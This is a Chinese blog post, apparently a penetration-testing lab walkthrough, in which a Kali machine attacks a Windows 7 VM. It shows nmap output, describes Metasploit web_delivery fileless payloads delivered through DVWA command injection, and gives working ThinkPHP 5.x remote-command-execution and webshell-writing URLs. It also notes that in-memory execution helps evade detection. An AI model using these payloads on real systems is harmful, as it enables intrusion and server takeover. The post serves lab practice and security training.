目标攻击漏洞获取目标机器最高权限

目标攻击漏洞获取目标机器最高权限

目标站点

target: win7x64 192.168.123.1 60[DHCP]

attack: kali-linux 192.168.123.136

方法一:通过web站点,使用无文件的方式攻去利用执行

方法二:通过web站点, 上传webshell,返回給msf

方法三:攻击其他端口服务,拿到meterpreterc

信息收集总在前- nmap端口扫描

root@kali:~# nmap -sV -T4 192.168.123.160

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-17 15:20 CST

Nmap scan report for 192.168.123.160

Host is up (0.00057s latency).

Not shown: 988 closed ports

PORTSTATE SERVICEVERSION

80/tcpopen http

Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j mod fcgid/2.3.9)

135/tcp open msrpcMicrosoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft- ds (workgroup: WORKGROUP)3306/tcp open mysqlMySQL (unauthorized)

MAC Address: 00:0C:29:7C:DA:E3 (VMware)

Service Info: Host: USER-20181210Fl; OS: Windows; CРE: cpe:/o:microsoft:windows

方法一

➢访问web站点,寻找漏洞点

http://192.168.1 23.160/dvwa/vulnerabilities/exec/#

➢如何利用?

当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web. delivery就派上用场。web delivery的主要目的是快速和受害者主机建立一条session。 当受害者主机存在比如命令注入、远程命令执行等问题时.攻击者可以使用web delivery生成的一条命令建立连接。

另外web_ delivery的payload不会在受害者主机磁盘上写文件,而是直接将攻击者服务器上的代码加载到内存执行,有利于绕过检测。

web delivery支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过settarget 0或1或2来设置是使用php还是python还是powershel等。

方法二

➢访问web站点,寻找漏洞点http://192.168.123.160/html/public/

使用ThinkPHP V5.1软件

➢如何利用-写入webshell

http://192.168.123.160/html/public/index.php?

s=indexNthink\template\driver\file/write&.cacheFile= phpinfo.php&content= %3C?php%20phpinfo();?%3E

➢如何利用-连接webshell-.上传后门文件

在这里插入图片描述

➢找到漏洞利用点

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本)远程命令执行漏洞利用(GetShell)

http://192.168.123.160/html/public/index.php?s= /index/\think\app/invokefunction&function=call user func_ array&vars[0]=system&vars[1][=whoami

http://192.168.123.160/html/public/index. php?s= /index/\think\request/cache&key= whoamilsystem
请不要干坏事哦~~

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值